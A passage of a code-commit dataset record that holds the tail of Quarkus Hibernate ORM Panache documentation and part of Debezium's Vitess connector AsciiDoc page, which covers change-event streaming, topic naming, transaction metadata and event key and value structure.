personRepository.count();\n}\n--\n\nSo if Repositories are your thing, you can keep doing them. Even with repositories, you can keep your entities as\nsubclasses of `PanacheEntity` in order to get the ID and public fields working, but you can even skip that and\ngo back to specifying your ID and using getters and setters if that's your thing. We're not judging.\n\n== Transactions\n\nMake sure to wrap methods modifying your database (e.g. `entity.persist()`) within a transaction. Marking a \nCDI bean method `@Transactional` will do that for you and make that method a transaction boundary. 
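For example, a hypothetical JAX-RS resource method could look like this (a minimal sketch; the resource class, path, and `create` method are illustrative, not from the guide):\n\n[source,java]\n--\n@Path(\"\/persons\")\npublic class PersonResource {\n\n \/\/ the method body runs in a transaction; changes are\n \/\/ committed when the method completes successfully\n @POST\n @Transactional\n public void create(Person person) {\n person.persist();\n }\n}\n--\n\n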
We recommend doing \nso at your application entry point boundaries like your REST endpoint controllers.\n\n== Lock management\n\nPanache does not provide direct support for database locking, but you can do it by obtaining the `EntityManager` (by injecting it into a `PanacheRepository`, or via `Panache.getEntityManager()` in an entity's static methods) and creating a specific method that will use the entity manager to lock the entity after retrieval.\n\nThe following example contains a `findByIdForUpdate` method that finds the entity by primary key and then locks it. The lock will generate a `SELECT ... FOR UPDATE` query (the same principle can be used for other kinds of `find*` methods):\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n\n public static Person findByIfForUpdate(Long id){\n Person person = findById(id);\n \/\/ lock with the PESSIMISTIC_WRITE lock mode type: this will generate a SELECT ... FOR UPDATE query\n Panache.getEntityManager().lock(person, LockModeType.PESSIMISTIC_WRITE);\n return person;\n }\n}\n--\n\nThis will generate two select queries: one to retrieve the entity and a second one to lock it. Be aware that locks are released when the transaction ends, so the method that invokes the lock query must be annotated with the `@Transactional` annotation.\n\nWe are currently evaluating adding support for lock management inside Panache. If you are interested, please visit our GitHub issue link:https:\/\/github.com\/quarkusio\/quarkus\/issues\/2744[#2744] and contribute to the discussion.\n\n== Custom IDs\n\nIDs are often a touchy subject, and not everyone's up for letting the framework handle them. Once again, we\nhave you covered.\n\nYou can specify your own ID strategy by extending `PanacheEntityBase` instead of `PanacheEntity`. 
Then\nyou just declare whatever ID you want as a public field:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntityBase {\n\n @Id\n @SequenceGenerator(\n name = \"personSequence\",\n sequenceName = \"person_id_seq\",\n allocationSize = 1,\n initialValue = 4)\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"personSequence\")\n public Integer id;\n\n ...\n}\n--\n\nIf you're using repositories, then you will want to extend `PanacheRepositoryBase` instead of `PanacheRepository`\nand specify your ID type as an extra type parameter:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepositoryBase<Person,Integer> {\n\n ...\n}\n--\n\n== How and why we simplify Hibernate ORM mappings\n\nWhen it comes to writing Hibernate ORM entities, there are a number of annoying things that users have grown used to \nreluctantly dealing with, such as:\n\n- Duplicating ID logic: most entities need an ID, and most people don't care how it's set, because it's not really\nrelevant to your model.\n- Dumb getters and setters: since Java lacks support for properties in the language, we have to create fields,\nthen generate getters and setters for those fields, even if they don't actually do anything more than read\/write\nthe fields.\n- Traditional EE patterns advise splitting the entity definition (the model) from the operations you can do on it\n(DAOs, Repositories), but really that requires an unnatural split between the state and its operations even though\nwe would never do something like that for regular objects in an object-oriented architecture, where state and methods\nare in the same class. Moreover, this requires two classes per entity, and requires injection of the DAO or Repository\nwhere you need to do entity operations, which breaks your edit flow and requires you to get out of the code you're\nwriting to set up an injection point before coming back to use it.\n- Hibernate queries are super powerful, but overly verbose for common operations, requiring you to write queries even\nwhen you don't need all the parts.\n- Hibernate is very general-purpose, but does not make it trivial to do trivial operations that make up 90% of our\nmodel usage.\n\nWith Panache, we took an opinionated approach to tackle all these problems:\n\n- Make your entities extend `PanacheEntity`: it has an ID field that is auto-generated. If you require\na custom ID strategy, you can extend `PanacheEntityBase` instead and handle the ID yourself.\n- Use public fields. Get rid of dumb getters and setters. Under the hood, we will generate all getters and setters\nthat are missing, and rewrite every access to these fields to use the accessor methods. This way you can still\nwrite _useful_ accessors when you need them, which will be used even though your entity users still use field accesses.\n- Don't use DAOs or Repositories: put all your entity logic in static methods in your entity class. Your entity superclass\ncomes with lots of super useful static methods and you can add your own in your entity class. Users can just start using\nyour entity `Person` by typing `Person.` and getting completion for all the operations in a single place.\n- Don't write parts of the query that you don't need: write `Person.find(\"order by name\")` or\n`Person.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive)` or even better\n`Person.find(\"name\", \"stef\")`.\n\nThat's all there is to it: with Panache, Hibernate ORM has never looked so trim and neat. 
\n\n== Defining entities in external projects or jars\n\nHibernate ORM in Quarkus relies on compile-time bytecode enhancements to your entities. If you define your entities in the\nsame project where you build your Quarkus application, everything will work fine. If the entities come from external projects\nor jars, you can make sure that your jar is treated like a Quarkus application library by adding an empty `META-INF\/beans.xml` file.\nThis will allow Quarkus to index and enhance your entities as if they were inside the current project.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1425c9208d6afd3d2af12015a8ca0631ce8819f8","subject":"DBZ-4886 update documentation","message":"DBZ-4886 update documentation\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/vitess.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/vitess.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-vitess\"]\n= {prodname} connector for Vitess\n:context: vitess\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n{prodname}'s Vitess connector captures row-level changes in the shards of a Vitess link:https:\/\/vitess.io\/docs\/concepts\/keyspace\/[keyspace].\nFor information about the Vitess versions that are compatible with this connector, see the link:https:\/\/debezium.io\/releases\/[{prodname} release overview].\n\nThe connector does not currently support the snapshot feature. The first time it connects to a Vitess cluster, it starts from the current VGTID location of the keyspace and continuously captures row-level changes that insert, update, and delete database content and that were committed to a Vitess keyspace. The connector generates data change event records and streams them to Kafka topics. For each table, the default behavior is that the connector streams all generated events to a separate Kafka topic for that table. Applications and services consume data change event records from that topic.\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} Vitess connector\n\/\/ ModuleID: overview-of-debezium-vitess-connector\n[[vitess-overview]]\n== Overview\n\nVitess's link:https:\/\/vitess.io\/docs\/concepts\/vstream\/[VStream] feature was introduced in version 4.0. It is a change event subscription service that provides equivalent information to the MySQL binary logs from the underlying MySQL shards of the Vitess cluster. A user can subscribe to multiple shards in a keyspace, making it a convenient tool to feed downstream CDC processes.\n\nTo read and process database changes, the Vitess connector subscribes to link:https:\/\/vitess.io\/docs\/concepts\/vtgate\/[VTGate]'s VStream gRPC service. VTGate is a lightweight, stateless gRPC server, which is part of the Vitess cluster setup.\n\nThe connector gives you the flexibility to choose to subscribe to the `MASTER` nodes, or to the `REPLICA` nodes for change events.\n\nThe connector produces a change event for every row-level insert, update, and delete operation that was captured and sends change event records for each table in a separate Kafka topic. Client applications read the Kafka topics that correspond to the database tables of interest, and can react to every row-level event they receive from those topics.\n\nThe connector is tolerant of failures. 
As the connector reads changes and produces events, it records the VGTID position for each event. If the connector stops for any reason (including communication failures, network problems, or crashes), upon restart the connector continues reading the VStream from the position where it last left off.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-vitess-connectors-work\n\/\/ Title: How {prodname} Vitess connectors work\n[[how-the-vitess-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} Vitess connector, it is helpful to understand how the connector streams change events, determines Kafka topic names, and uses metadata.\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-vitess-connectors-stream-change-event-records\n\/\/ Title: How {prodname} Vitess connectors stream change event records\n[[vitess-streaming-changes]]\n=== Streaming changes\n\nThe Vitess connector spends all its time streaming changes from the VTGate's VStream gRPC service to which it is subscribed. The client receives changes from VStream as they are committed in the underlying MySQL server's binlog at certain positions, which are referred to as VGTID.\n\nThe VGTID in Vitess is the equivalent of GTID in MySQL; it describes the position in the VStream at which a change event happens. Typically, a VGTID has multiple shard GTIDs; each shard GTID is a tuple of `(Keyspace, Shard, GTID)` that describes the GTID position of a given shard.\n\nWhen subscribing to a VStream service, the connector needs to provide a VGTID and a link:https:\/\/vitess.io\/docs\/concepts\/tablet\/#tablet-types[Tablet Type] (e.g. `MASTER`, `REPLICA`). The VGTID describes the position from which VStream should start sending change events; the Tablet type describes the underlying MySQL instance (master or replica) in each shard from which the connector reads change events.\n\nThe first time the connector connects to a Vitess cluster, it gets the current VGTID from a Vitess component called link:https:\/\/vitess.io\/docs\/concepts\/vtctld\/[VTCtld] and provides the current VGTID to VStream.\n\nThe {prodname} Vitess connector acts as a gRPC client of VStream. When the connector receives changes, it transforms the events into {prodname} _create_, _update_, or _delete_ events that include the VGTID of the event. The Vitess connector forwards these change events in records to the Kafka Connect framework, which is running in the same process. The Kafka Connect process asynchronously writes the change event records in the same order in which they were generated to the appropriate Kafka topic.\n\nPeriodically, Kafka Connect records the most recent _offset_ in another Kafka topic. The offset indicates source-specific position information that {prodname} includes with each event. For the Vitess connector, the VGTID recorded in each change event is the offset.\n\nWhen Kafka Connect gracefully shuts down, it stops the connectors, flushes all event records to Kafka, and records the last offset received from each connector. When Kafka Connect restarts, it reads the last recorded offset for each connector, and starts each connector at its last recorded offset. 
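For reference, the VGTID that the connector records as its offset might look like the following for an unsharded keyspace (an illustrative value modeled on the transaction metadata example shown later in this document):\n\n[source,json]\n----\n[\n {\n \"keyspace\": \"test_unsharded_keyspace\",\n \"shard\": \"0\",\n \"gtid\": \"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-37\"\n }\n]\n----\n\n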
When the connector restarts, it sends a request to VStream to send the events starting just after that position.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-vitess-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} Vitess change event records\n[[vitess-topic-names]]\n=== Topic names\n\nThe Vitess connector writes events for all insert, update, and delete operations on a single table to a single Kafka topic. By default, the Kafka topic name is _serverName_._keyspaceName_._tableName_ where:\n\n* _serverName_ is the logical name of the connector as specified with the `database.server.name` connector configuration property.\n* _keyspaceName_ is the name of the keyspace (a.k.a. database) where the operation occurred.\n* _tableName_ is the name of the database table in which the operation occurred.\n\nFor example, suppose that `fulfillment` is the logical server name in the configuration for a connector that is capturing changes in a Vitess installation that has a `commerce` keyspace that contains four tables: `products`, `products_on_hand`, `customers`, and `orders`. Regardless of how many shards the keyspace has, the connector would stream records to these four Kafka topics:\n\n* `fulfillment.commerce.products`\n* `fulfillment.commerce.products_on_hand`\n* `fulfillment.commerce.customers`\n* `fulfillment.commerce.orders`\n\n[[vitess-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich data change event messages.\n\n[NOTE]\n.Limits on when {prodname} receives transaction metadata\n====\n{prodname} registers and receives metadata only for transactions that occur after you deploy the connector.\nMetadata for transactions that occur before you deploy the connector is not available.\n====\n\n{prodname} generates transaction boundary events for the `BEGIN` and `END` delimiters in every transaction.\nTransaction boundary events contain the following fields:\n\n`status`:: `BEGIN` or `END`.\n`id`:: String representation of the unique transaction identifier.\n`event_count` (for `END` events):: Total number of events emitted by the transaction.\n`data_collections` (for `END` events):: An array of pairs of `data_collection` and `event_count` elements\nthat indicates the number of events that the connector emits for changes that originate from a data collection.\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n  \"status\": \"BEGIN\",\n  \"id\": \"[{\\\"keyspace\\\":\\\"test_unsharded_keyspace\\\",\\\"shard\\\":\\\"0\\\",\\\"gtid\\\":\\\"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-37\\\"}]\",\n  \"event_count\": null,\n  \"data_collections\": null\n}\n\n{\n  \"status\": \"END\",\n  \"id\": \"[{\\\"keyspace\\\":\\\"test_unsharded_keyspace\\\",\\\"shard\\\":\\\"0\\\",\\\"gtid\\\":\\\"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-37\\\"}]\",\n  \"event_count\": 1,\n  \"data_collections\": [\n    {\n      \"data_collection\": \"test_unsharded_keyspace.my_seq\",\n      \"event_count\": 1\n    }\n  ]\n}\n----\n\nUnless overridden via the xref:vitess-property-transaction-topic[`transaction.topic`] option,\nthe connector emits transaction events to the xref:vitess-property-database-server-name[`_<database.server.name>_`]`.transaction` topic.\n\n.Change data event enrichment\n\nWhen transaction metadata is enabled, the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form 
of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n  \"before\": null,\n  \"after\": {\n    \"pk\": \"2\",\n    \"aa\": \"1\"\n  },\n  \"source\": {\n...\n  },\n  \"op\": \"c\",\n  \"ts_ms\": 1637988245467,\n  \"transaction\": {\n    \"id\": \"[{\\\"keyspace\\\":\\\"test_unsharded_keyspace\\\",\\\"shard\\\":\\\"0\\\",\\\"gtid\\\":\\\"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-68\\\"}]\",\n    \"total_order\": 1,\n    \"data_collection_order\": 1\n  }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-vitess-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} Vitess connector data change events\n[[vitess-events]]\n== Data change events\n\nThe {prodname} Vitess connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n   ...\n  },\n \"payload\": { \/\/ <2>\n   ...\n },\n \"schema\": { \/\/ <3>\n   ...\n },\n \"payload\": { \/\/ <4>\n   ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the first single-column unique key if the table does not have a primary key, for the table that was changed. Multi-column unique keys are not supported. +\n +\nIt is possible to override the table's primary key by setting the xref:vitess-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. 
It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\n\nThe default behavior is that the connector streams change event records to xref:vitess-topic-names[topics with names that are the same as the event's originating table].\n\n[NOTE]\n====\nStarting with Kafka 0.10, Kafka can optionally record the event key and value with the {link-kafka-docs}.html#upgrade_10_performance_impact[_timestamp_] at which the message was created (recorded by the producer) or written to the log by Kafka.\n====\n\n[WARNING]\n====\nThe Vitess connector ensures that all Kafka Connect schema names adhere to the http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the schema and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a schema name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\n[IMPORTANT]\n====\nThe connector does not allow column names with the `@` prefix at the moment. For example, `age` is a valid column name, and `@age` is not. The reason is that the Vitess vstreamer has a bug that sends events with anonymized column names (e.g. the column name `age` is anonymized to `@1`). There is no easy way to differentiate between a legitimate column name with the `@` prefix and the Vitess bug. 
See more discussion link:https:\/\/vitess.slack.com\/archives\/C0PQY0PTK\/p1606817216038500[here].\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-vitess-change-events\n\/\/ Title: About keys in {prodname} Vitess change events\n[[vitess-change-events-key]]\n=== Change event keys\n\nFor a given table, the change event's key has a structure that contains a field for each column in the primary key of the table at the time the event was created.\n\nConsider a `customers` table defined in the `commerce` keyspace and the example of a change event key for that table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n  id INT NOT NULL,\n  first_name VARCHAR(255) NOT NULL,\n  last_name VARCHAR(255) NOT NULL,\n  email VARCHAR(255) NOT NULL,\n  PRIMARY KEY(id)\n);\n----\n\n.Example change event key\nIf the `database.server.name` connector configuration property has the value `Vitess_server`, every change event for the `customers` table while it has this definition has the same key structure, which in JSON looks like this:\n\n[source,json,indent=0]\n----\n  {\n  \"schema\": { \/\/ <1>\n    \"type\": \"struct\",\n    \"name\": \"Vitess_server.commerce.customers.Key\", \/\/ <2>\n    \"optional\": false, \/\/ <3>\n    \"fields\": [ \/\/ <4>\n      {\n        \"name\": \"id\",\n        \"index\": \"0\",\n        \"schema\": {\n          \"type\": \"INT32\",\n          \"optional\": \"false\"\n        }\n      }\n    ]\n  },\n  \"payload\": { \/\/ <5>\n    \"id\": \"1\"\n  },\n  }\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`Vitess_server.commerce.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._keyspace-name_._table-name_.`Key`. In this example: +\n\n* `Vitess_server` is the name of the connector that generated this event. +\n* `commerce` is the keyspace that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, index, and schema.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key contains a single `id` field whose value is `1`.\n\n|===\n\n[NOTE]\n====\nAlthough the `column.exclude.list` and `column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary key, then the change event's key is null. The rows in a table without a primary key constraint cannot be uniquely identified.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-vitess-change-events\n\/\/ Title: About values in {prodname} Vitess change events\n[[vitess-change-events-value]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. 
The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INT NOT NULL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\nThe emitted events for `UPDATE` and `DELETE` operations contain the previous values of all columns in the table.\n\n\/\/ Type: continue\n[[vitess-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,options=\"nowrap\",indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"Vitess_server.commerce.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"Vitess_server.commerce.customers.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"vgtid\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.vitess.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"Vitess_server.commerce.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 1,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"vitess\",\n \"name\": \"my_sharded_connector\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": true,\n \"db\": \"\",\n \"keyspace\": 
\"commerce\",\n \"table\": \"customers\",\n \"vgtid\": \"[{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"80-\\\",\\\"gtid\\\":\\\"MariaDB\/0-54610504-47\\\"},{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"-80\\\",\\\"gtid\\\":\\\"MariaDB\/0-1592148-45\\\"}]\"\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559033904863 \/\/ <10>\n }\n}\n----\n\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`Vitess_server.commerce.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._keyspaceName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the xref:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.vitess.Source` is the schema for the payload's `source` field. This schema is specific to the Vitess connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`Vitess_server.commerce.customers.Envelope` is the schema for the overall structure of the payload, where `Vitess_server` is the connector name, `commerce` is the keyspace, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the xref:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\na|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database (a.k.a keyspace) and table that contains the new row\n* If the event was part of a snapshot\n* Offset of the operation in the database binlog\n* Timestamp for when the change was made in the database\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. 
Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n\/\/ Type: continue\n[[vitess-update-events]]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"vitess\",\n \"name\": \"my_sharded_connector\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": null,\n \"db\": \"\",\n \"keyspace\": \"commerce\",\n \"table\": \"customers\",\n \"vgtid\": \"[{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"80-\\\",\\\"gtid\\\":\\\"MariaDB\/0-54610504-47\\\"},{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"-80\\\",\\\"gtid\\\":\\\"MariaDB\/0-1592148-46\\\"}]\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465584025523 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that contains all values of all columns that were in the row before the database commit.\n\n|2\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `first_name` value is now `Anne Marie`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database (a.k.a keyspace) and table that contains the new row\n* If the event was part of a snapshot\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. 
By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a xref:vitess-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section.\n====\n\n[[vitess-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n    \"schema\": { ... },\n    \"payload\": {\n        \"before\": { \/\/ <1>\n            \"id\": 1,\n            \"first_name\": \"Anne Marie\",\n            \"last_name\": \"Kretchmar\",\n            \"email\": \"annek@noanswer.org\"\n        },\n        \"after\": null, \/\/ <2>\n        \"source\": { \/\/ <3>\n            \"version\": \"{debezium-version}\",\n            \"connector\": \"vitess\",\n            \"name\": \"my_sharded_connector\",\n            \"ts_ms\": 1559033904863,\n            \"snapshot\": null,\n            \"db\": \"\",\n            \"keyspace\": \"commerce\",\n            \"table\": \"customers\",\n            \"vgtid\": 